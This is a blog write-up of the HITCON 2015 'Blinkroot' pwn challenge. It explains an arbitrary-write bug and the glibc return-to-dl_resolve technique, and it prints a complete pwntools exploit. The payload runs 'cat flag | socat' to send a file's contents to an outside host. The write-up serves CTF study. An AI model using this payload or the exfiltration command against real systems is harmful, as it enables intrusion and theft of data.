HITCON 2015 Quals Pwn Blinkroot Write-up

Introduction

This post gives a write-up on Blinkroot in HITCON 2015 and uses this challenge to demonstrate the return-to-dl_resolve method in glibc.

Vulnerability Analysis

The pseudocode of this can be simply translated as following:

char data[1024];
int main()
{
    if (recvlen(0, data, 1024) == 1024) {
        close(0);
        close(1);
        close(1);
        data[(int)data] = 0x10;
        data[(int)data+8] = data[8];
        puts(data[16]);
    }
    exit(0);
}

The attacker is able to write any value at a chose place in memory. Due to “movaps” instruction in binary, the chosen address must be aligned.

Exploit Plan

Since this challenge closes the stdin and stdout, we cannot overwrite a function pointer with one-gadget address. And since we cannot leak any info about dynamic library, it’s hard for us to leak the base address of libc. Therefore we need to apply return-to-dl_resolve function to hijack control flow to system with argument string “cat flag | socat ….”.
According to the write-up in [1], it seems that I pick the correct desired solution. It’s just because that the desired solution seems to be the shortest execution path in this challenge. More details will be given in my tutorial.

Exploit

from pwn import *

DEBUG = int(sys.argv[1]);


if(DEBUG == 0):
	r = remote("1.2.3.4", 233333);
elif(DEBUG == 1):
	r = process("./blinkroot");
elif(DEBUG == 2):
	r = process("./blinkroot");
	gdb.attach(r, '''source ./script.py''');

def halt():
	while(True):
		log.info(r.recvline());

def exploit():
	#sleep(1);
	payload = p64(0xffffffffffffff80) + p64(0x600d00);
	payload = payload + "cat flag | socat - TCP4:10.0.2.15:31337;\x00";
	payload = payload.ljust(0x140, '\x00');


	fake_l_addr = 0x24870;
	payload = payload + p64(fake_l_addr);
	payload = payload + p64(0x40) * 12;
	payload = payload + p64(0x600e00);
	payload = payload + p64(0x600e08);
	payload = payload + p64(0x41) * 16;
	payload = payload + p64(0x600e10);
	payload = payload + p64(0x42);
	payload = payload + p64(0x43);
	payload = payload + p64(0x600b78);
	payload = payload + p64(0x600e18);
	payload = payload + p64(0x44) *2;

	fake_reloc_roffset = 0x5dc2f0;
	payload = payload + p64(fake_reloc_roffset);
	payload = payload + p64(7);

	payload = payload.ljust(0x3ff, '\x00');
	r.sendline(payload);

exploit();

Reference

[1] http://ddaa.tw/hitcon_pwn_200_blinkroot.html

Advertisements
Categories: pwn

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.